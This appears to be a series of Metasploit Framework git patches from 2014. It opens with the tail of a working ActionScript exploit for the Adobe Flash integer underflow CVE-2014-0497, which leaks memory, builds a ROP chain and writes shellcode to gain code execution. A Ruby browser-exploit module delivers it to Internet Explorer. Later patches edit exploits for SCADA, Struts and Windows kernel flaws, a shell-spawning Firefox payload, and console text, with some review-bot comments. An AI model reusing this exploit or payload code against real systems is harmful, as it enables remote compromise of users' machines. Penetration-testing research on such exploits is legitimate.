+ // Example leak: 0275ef00 => 10c4f508 0000003b 00002326 + if (((!((li16((_local_6 + 1)) == 114))) && (((vftable_addr = li32((_local_6 - 0x0100)) ) == 305419896)))) + { + }; + if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_idx = li32((_local_6 - 248)) ) == 305419896)))) + { + }; + vector_objects_entry_idx = (vector_objects_entry_idx >> 3); + if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_length = li32((_local_6 - 252)) ) == 305419896)))) + { + }; + + // No success + if (vector_objects_entry_length != vector_objects[vector_objects_entry_idx].length) + { + vickers_byte_array = null; + vector_byte_arrays[length_vector_byte_arrays] = null; + i = 0; + while (i < vector_objects.length) + { + vector_objects[i++] = null; + }; + return (false); + }; + + i = 0; + while (i < vector_objects.length) + { + if (i != vector_objects_entry_idx) + { + vector_objects[i] = null; + }; + i++; + }; + // Use underflow to leak shellcode address + if (((!((li16((_local_6 + 1)) == 114))) && (((shellcode_address = li32((_local_6 - 0x0200)) ) == 305419896)))) + { + }; + shellcode_address = (shellcode_address + 0x1300); + var rop_payload:ByteArray = makePayload(vftable_addr, shellcode_address); + if (rop_payload == null) + { + return (true); + }; + var j:uint; + var shellcode_length:uint = shellcode.length; + var shellcode_byte_array:ByteArray = new ByteArray(); + shellcode_byte_array.endian = "littleEndian"; + while (j < shellcode_length) + { + shellcode_byte = (shellcode.charAt(j) + shellcode.charAt((j + 1))); + shellcode_byte_array.writeByte(parseInt(shellcode_byte, 16)); + j = (j + 2); + }; + vector_byte_arrays[length_vector_byte_arrays].position = 0; + vector_byte_arrays[length_vector_byte_arrays].endian = "littleEndian"; + vector_byte_arrays[length_vector_byte_arrays].writeBytes(rop_payload); + vector_byte_arrays[length_vector_byte_arrays].writeBytes(shellcode_byte_array); + // Use underflow to overwrite and get code execution + if (li16((_local_6 + 
1)) != 114) + { + si32((shellcode_address + 1), (_local_6 - 244)); + }; + vector_objects[vector_objects_entry_idx][1][0]; + return (true); + } + + + } +}//package diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb new file mode 100644 index 0000000000..afcf69616b --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb 
@@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player + before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an + integer underflow in several avm2 instructions, which can be turned into remote code + execution under the context of the user, as exploited in the wild in February 2014. This + module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP + SP3, Windows 7 SP1 and Windows 8 even when it includes rop chains for several Flash 11 + versions, as exploited in the wild. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + [ 'CVE', '2014-0497' ], + [ 'OSVDB', '102849' ], + [ 'BID', '65327' ], + [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ], + [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ], + [ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false + }, + 'Platform' => 'win', + # Versions targeted in the wild: + # [*] Windows 8: + # 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14 + # 11,6,602,167, 11,6,602,171 ,11,6,602,180 + # 11,7,700,169, 11,7,700,202, 11,7,700,224 + # [*] Before windows 8: + # 11,0,1,152, + # 11,1,102,55, 11,1,102,62, 11,1,102,63 + # 11,2,202,228, 11,2,202,233, 11,2,202,235 + # 11,3,300,257, 11,3,300,273 + # 11,4,402,278 + # 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149 + # 11,6,602,168, 11,6,602,171, 11,6,602,180 + # 11,7,700,169, 11,7,700,202 + # 11,8,800,97, 11,8,800,50 + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 5 2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) 
+ return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + shellcode = get_payload(cli, target_info).unpack("H*")[0] + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 5b150a04c61e9a5e38d2118acb7ba5edbb90e76a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 May 2014 20:08:00 -0500 Subject: [PATCH 241/853] Add testing information to description --- modules/exploits/windows/browser/adobe_flash_avm2.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index afcf69616b..8f423e53e0 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP - SP3, Windows 7 SP1 and Windows 8 even when it includes rop chains for several Flash 11 - versions, as exploited in the wild. + SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes + rop chains for several Flash 11 versions, as exploited in the wild. }, 'License' => MSF_LICENSE, 'Author' => 
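Review bot: In `create_swf` of the new adobe_flash_avm2.rb, the line `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` twice, once inside the block and again from the block's return value, which hides that the method just returns the file contents. Making `::File.binread(path)` the method's last expression reads the same bytes without the temporary. Separately, the header comment reads `http//metasploit.com/download`, which is missing the colon after `http`.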
From dd7705055bd61747538af6b3c06da6951d55e85b Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Sun, 4 May 2014 19:31:53 +0200 Subject: [PATCH 242/853] Fix author --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 0be872543b..63f0cf3715 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Nikolas Sotiriu', # Vulnerability Discovery - 'Julian Vilas ', # Metasploit module + 'Redsadic ', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, From cc8ab9bcba52a2c1e17ce17080a4453a0b8754ae Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 5 May 2014 18:57:15 +1000 Subject: [PATCH 243/853] Support one line js payload Add missing ';' in `run_cmd_source` --- lib/msf/core/payload/firefox.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index db762a3f54..bdd10154a7 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -92,7 +92,7 @@ module Msf::Payload::Firefox try { retVal = Function('send', js[1])(function(r){ if (sent) return; - sent = true + sent = true; if (r) { if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); }); else cb(false, r+tag+"\\n"); @@ -111,7 +111,7 @@ module Msf::Payload::Firefox } var shEsc = "\\\\$&"; - var shPath = "/bin/sh -c" + var shPath = "/bin/sh -c"; if (windows) { shPath = "cmd /c"; From 3072c2f08ad8658f278066853604a094f3c6c013 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Mon, 5 May 2014 13:25:55 -0500 Subject: [PATCH 244/853] Update CVEs for RootedCon Yokogawa modules Noticed they were nicely documented at http://chemical-facility-security-news.blogspot.com/2014/03/ics-cert-publishes-yokogawa-advisory.html We apparently never updated with CVE numbers. --- modules/auxiliary/dos/scada/yokogawa_logsvr.rb | 3 ++- modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb | 3 ++- modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb | 3 ++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 8f11b42279..1fef0d305a 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0781'] ], 'DisclosureDate' => 'Mar 10 2014', )) diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 678dcb23e9..410eecec0d 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0784'] ], 'Payload' => { 
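Review bot: The added `[ 'CVE', '2014-0781']` entry in yokogawa_logsvr.rb drops the space before the closing bracket that the neighbouring `[ 'URL', ... ]` entries use. The same applies to `[ 'CVE', '2014-0784']` in yokogawa_bkbcopyd_bof.rb and `[ 'CVE', '2014-0783']` in yokogawa_bkhodeq_bof.rb. Writing `[ 'CVE', '2014-0781' ]` keeps the list uniform. The adobe_flash_avm2.rb module elsewhere on this page lists its CVE entry first in `References`, so placing the CVE ahead of the URLs may match convention better.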
diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index fc5144ec3f..cc6166ad9d 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0783'] ], 'Payload' => { From c6affcd6d3cbe0f74f7b99a1960774f6af62f663 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:38:53 -0500 Subject: [PATCH 245/853] Fix caps, description on F5 module The product name isn't "Load Balancer" as far as I can tell. --- modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 838bc2803e..a949fa36c5 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 BigIP Backend Cookie Disclosure', 'Description' => %q{ - This module identify F5 BigIP Load Balancers and leaks backends - information through cookies. + This module identifies F5 BigIP load balancers and leaks backend + information through cookies inserted by the BigIP devices. }, 'Author' => [ 'Thanat0s ' ], 'References' => 
@@ -96,13 +96,13 @@ class Metasploit3 < Msf::Auxiliary cookie = get_cookie() # Get the cookie # If the cookie is not found, stop process if cookie.empty? || cookie[:id].nil? - print_error("#{peer} - F5 Server Load Balancing cookie not found") + print_error("#{peer} - F5 Server load balancing cookie not found") break end # Print the cookie name on the first request if i == 0 - print_status("#{peer} - F5 Server Load Balancing \"#{cookie[:id]}\" found") + print_status("#{peer} - F5 Server load balancing cookie \"#{cookie[:id]}\" found") end back_end = cookie_decode(cookie[:value]) From 3536ec9a742b3a579bd94fa64f676bd8b95c641a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:43:44 -0500 Subject: [PATCH 246/853] Description update --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index ee944aaeae..344061f9e5 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts - versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows - access to 'class' parameter which is directly mapped to getClass() method and - allows ClassLoader manipulation, which allows remote attackers to execute arbitrary + versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows + access to 'class' parameter that is directly mapped to getClass() method and + allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary Java code via crafted parameters. }, 'Author' => 
From c97c827140b5961843e35af23c4612a694301bd8 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:46:19 -0500 Subject: [PATCH 247/853] Adjust desc and ranking on ms13-053 Since it's likely to crash winlogin.exe in the normal use case (eventually), I've kicked this down to Average ranking. --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 48e9fa8da3..daab80e39a 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local - Rank = GreatRanking + Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv @@ -20,11 +20,11 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, { 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ - A kernel pool overflow in Win32k which allows local privilege escalation. + This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving - privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. - NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. + privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. + NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash. }, 'License' => MSF_LICENSE, 'Author' => From 57df34b54f559f5d7e6c62713a8407e400a2da99 Mon Sep 17 00:00:00 2001 
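Review bot: The rewritten NOTE sentence in the `Description` of ms13_053_schlamperei.rb names `winlogin.exe`, but the process referred to twice earlier in the same description is `winlogon.exe`. The line should read `NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.` The commit message carries the same misspelling. Because this sentence is the stability warning that justifies the lower ranking, the process name in it should be exact. The `initialize` body continues outside the hunk.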
From: Meatballs Date: Mon, 5 May 2014 21:18:48 +0100 Subject: [PATCH 248/853] Fix some yarddoc issues --- lib/msf/core/modules/loader/directory.rb | 2 +- lib/rex/mime/part.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb | 2 +- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index aed29b7be2..a5712125ce 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -109,4 +109,4 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base module_content end -end \ No newline at end of file +end diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 40ddcdded7..ef80bb5ec5 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -36,8 +36,8 @@ class Part # Returns the Content-Transfer-Encoding of the part. # - # @returns [nil] if the part hasn't Content-Transfer-Encoding. - # @returns [String] The Content-Transfer-Encoding or the part. + # @return [nil] if the part hasn't Content-Transfer-Encoding. + # @return [String] The Content-Transfer-Encoding or the part. def transfer_encoding h = header.find('Content-Transfer-Encoding') return nil if h.nil? diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb index d7a7db2409..ad7731162d 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb @@ -32,7 +32,7 @@ class Adsi # @param fields [Array] Array of string fields to return for # each result found # - # @returns [Hash] Array of field names with associated results. + # @return [Hash] Array of field names with associated results. # def domain_query(domain_name, filter, max_results, page_size, fields) request = Packet.create_request('extapi_adsi_domain_query') 
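Review bot: The corrected tag in lib/rex/mime/part.rb still carries a typo, `# @return [String] The Content-Transfer-Encoding or the part.`, where `or` should be `of`. In adsi.rb and wmi.rb the tag `@return [Hash] Array of field names ...` declares a Hash while describing an Array. The method bodies are outside the hunks, so which one is right cannot be confirmed here, but the declared type and the description should agree. The same hunks are repeated in PATCH 249 directly below.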
diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index c6351318bd..fde12f624e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -26,7 +26,7 @@ class Wmi # @param root [String] Specify root to target, otherwise defaults # to 'root\cimv2' # - # @returns [Hash] Array of field names with associated values. + # @return [Hash] Array of field names with associated values. # def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') From 3542f851bf6e3f80c05ad6918fec585a2ac2b4b7 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 5 May 2014 21:18:48 +0100 Subject: [PATCH 249/853] Fix some yarddoc issues --- lib/msf/core/modules/loader/directory.rb | 2 +- lib/rex/mime/part.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb | 2 +- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index aed29b7be2..a5712125ce 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -109,4 +109,4 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base module_content end -end \ No newline at end of file +end diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 40ddcdded7..ef80bb5ec5 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -36,8 +36,8 @@ class Part # Returns the Content-Transfer-Encoding of the part. # - # @returns [nil] if the part hasn't Content-Transfer-Encoding. - # @returns [String] The Content-Transfer-Encoding or the part. + # @return [nil] if the part hasn't Content-Transfer-Encoding. + # @return [String] The Content-Transfer-Encoding or the part. def transfer_encoding h = header.find('Content-Transfer-Encoding') return nil if h.nil? 
diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb index d7a7db2409..ad7731162d 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb @@ -32,7 +32,7 @@ class Adsi # @param fields [Array] Array of string fields to return for # each result found # - # @returns [Hash] Array of field names with associated results. + # @return [Hash] Array of field names with associated results. # def domain_query(domain_name, filter, max_results, page_size, fields) request = Packet.create_request('extapi_adsi_domain_query') diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index c6351318bd..fde12f624e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -26,7 +26,7 @@ class Wmi # @param root [String] Specify root to target, otherwise defaults # to 'root\cimv2' # - # @returns [Hash] Array of field names with associated values. + # @return [Hash] Array of field names with associated values. # def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') From 1f3466a3a3ef68cda5955067d60e82763923e4fe Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 5 May 2014 23:21:54 +0200 Subject: [PATCH 250/853] Added Modbus error handling. It now checks for error and displays the appropriate error message. The only error simulated was "ILLEGAL ADDRESS", don't know how to test for others. --- .../auxiliary/scanner/scada/modbusclient.rb | 38 +++++++++++++++++-- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 43e7cd99a4..b6f83c835c 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
@@ -93,6 +93,24 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def handle_error(response) + case response.reverse.unpack("c")[0].to_i + when 1 + print_error("Error : ILLEGAL FUNCTION") + when 2 + print_error("Error : ILLEGAL DATA ADDRESS") + when 3 + print_error("Error : ILLEGAL DATA VALUE") + when 4 + print_error("Error : SLAVE DEVICE FAILURE") + when 6 + print_error("Error : SLAVE DEVICE BUSY") + else + print_error("Unknown error") + end + return + end + def read_coil @function_code = 1 print_status("Sending READ COIL...") @@ -100,8 +118,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the READ COIL") return + elsif response.unpack("C*")[-2] == 129 + handle_error(response) + else + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) end - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) end def read_register @@ -111,9 +132,12 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the READ REGISTER") return - end + elsif response.unpack("C*")[-2] == 131 + handle_error(response) + else value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + end end def write_coil @@ -131,8 +155,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the WRITE COIL") return + elsif response.unpack("C*")[-2] == 133 + handle_error(response) + else + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") end - print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") end def write_register 
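Review bot: In `handle_error`, any exception code other than 1–4 and 6 is reported as `Unknown error` and the value is discarded, so the code cannot be looked up in the Modbus specification afterwards. Keep the decoded byte in a local and print it in the fallback, e.g. `print_error("Unknown error (exception code #{code})")`. The bare `return` before the final `end` is redundant, and a one-line comment stating that the last byte of an exception response is the exception code would explain the `reverse.unpack("c")` idiom.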
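Review bot: The error test in `read_register`, `response.unpack("C*")[-2] == 131`, inspects the second-to-last byte, which in a normal reply appears to be the high byte of the register value that the following line slices out with `[9..10]`, so a register holding 0x83xx would be reported as an error. The `== 134` test in the `write_register` hunk looks exposed to the same collision with the echoed value. The function-code byte sits at a fixed offset after the 7-byte MBAP header, so `response.unpack("C*")[7] == (@function_code | 0x80)` would be unambiguous and would also replace the magic numbers 129/131/133/134 in all four methods. This assumes the response still carries the full Modbus/TCP header, as the `[9..10]` slice suggests; the method bodies start outside the hunks.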
@@ -146,8 +173,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the WRITE REGISTER") return + elsif response.unpack("C*")[-2] == 134 + handle_error(response) + else + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") end - print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") end def run From a55e2bcf19e7e13a2cd57c49f4e7f5534dd881e9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:38:59 -0500 Subject: [PATCH 251/853] Rework banner trailers in sprintf padding --- lib/msf/ui/console/command_dispatcher/core.rb | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8237fd1682..ca6427b7fe 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -397,21 +397,25 @@ class Core banner << "\n\n" end - banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n" - banner << "+ -- --=[ " - banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n" - banner << "+ -- --=[ " - oldwarn = nil avdwarn = nil - banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n" + banner_trailers = { + :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", + :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", + :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", + :free_trial => "Free Metasploit Pro trial: http://r-7.com/trymsp" + } + + banner << (" =[ %-57s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:pay_enc_nop]) # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition unless binary_install - banner << "+ -- --=[ 14-Day free trial: http://metasploit.pro ]" + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:free_trial]) end if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) From 7ed943cead9bb9234881899d04f762dcf5f50e1d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:39:39 -0500 Subject: [PATCH 252/853] Add new rotating banners for apt installs --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) 
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index ca6427b7fe..e2d9375558 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
